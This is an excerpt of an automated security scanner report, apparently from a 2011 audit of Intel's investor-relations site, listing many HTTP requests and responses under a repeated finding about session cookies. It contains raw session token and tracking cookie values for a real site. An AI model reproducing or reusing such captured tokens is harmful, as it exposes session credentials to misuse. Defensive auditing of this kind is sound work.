HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 23:14:51 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:51 GMT;path=/ Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:51 GMT;path=/ Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:14:51 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /eventdetail.cfm?EventID=92109 HTTP/1.1 Host: www.intc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 23:14:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A48%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:48 GMT;path=/ Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:48 GMT;path=/ Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:14:48 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /events.cfm HTTP/1.1 Host: www.intc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 23:14:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A49%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:49 GMT;path=/ Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:49 GMT;path=/ Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:14:49 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /faq.cfm HTTP/1.1 Host: www.intc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 23:16:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A16%3A33%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:16:33 GMT;path=/ Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:16:33 GMT;path=/ Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:16:33 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /financial-statements.cfm HTTP/1.1 Host: www.intc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 23:15:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A15%3A21%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:22 GMT;path=/ Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:22 GMT;path=/ Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:15:22 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /financials.cfm HTTP/1.1 Host: www.intc.com Proxy-Connection: keep-alive Referer: http://www.intc.com/index.cfm?iid=ftr+invrel Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NOMOBILE=0; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; __utmc=170079864; __utmb=170079864.2.10.1296947606; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A29%27%7D%7C1D065BF6CBF3E92923967C8F41218506; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 23:13:34 GMT Content-Type: text/html; charset=UTF-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A13%3A33%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:13:34 GMT;path=/ Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:13:34 GMT;path=/ Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:13:34 GMT;path=/ Vary: Accept-Encoding Content-Length: 43016
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /index.cfm?iid=ftr+invrel HTTP/1.1 Host: www.intc.com Proxy-Connection: keep-alive Referer: http://www.intel.com/p/en_US/business?iid=gg_work-en_US+home_business_portal Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 23:12:49 GMT Content-Type: text/html; charset=UTF-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: NOMOBILE=0;path=/ Set-Cookie: INTC_SESSION=1158415365%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A48%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A48%27%7D%7CB98F31D77EB5BDC04B24EA248F8FA9B0;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:12:49 GMT;path=/ Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7588889;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:12:49 GMT;path=/ Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:12:49 GMT;path=/ Vary: Accept-Encoding Content-Length: 37031
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /investorkit.cfm HTTP/1.1 Host: www.intc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 23:15:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A15%3A14%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:14 GMT;path=/ Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:14 GMT;path=/ Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:15:14 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /investornews.cfm HTTP/1.1 Host: www.intc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 23:16:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A16%3A07%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:16:08 GMT;path=/ Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:16:08 GMT;path=/ Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:16:08 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /outlook.cfm HTTP/1.1 Host: www.intc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 23:15:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A15%3A19%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:19 GMT;path=/ Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:19 GMT;path=/ Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:15:19 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /priceList.cfm HTTP/1.1 Host: www.intc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 23:15:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A15%3A07%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:07 GMT;path=/ Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:07 GMT;path=/ Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:15:07 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ratios.cfm HTTP/1.1 Host: www.intc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 23:15:20 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A15%3A20%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:20 GMT;path=/ Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:20 GMT;path=/ Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:15:20 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /releasedetail.cfm?ReleaseID=546454&ReleasesType=Home&ReleasesType=Home HTTP/1.1 Host: www.intc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 23:14:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A58%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:58 GMT;path=/ Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:58 GMT;path=/ Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:14:58 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /results.cfm HTTP/1.1 Host: www.intc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 23:15:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A15%3A20%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:21 GMT;path=/ Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:21 GMT;path=/ Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:15:21 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /search.cfm HTTP/1.1 Host: www.intc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 23:15:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A15%3A17%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:17 GMT;path=/ Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:17 GMT;path=/ Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:15:17 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sec.cfm HTTP/1.1 Host: www.intc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 23:16:37 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A16%3A37%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:16:37 GMT;path=/ Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:16:37 GMT;path=/ Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:16:37 GMT;path=/ Content-Type: text/html; charset=UTF-8
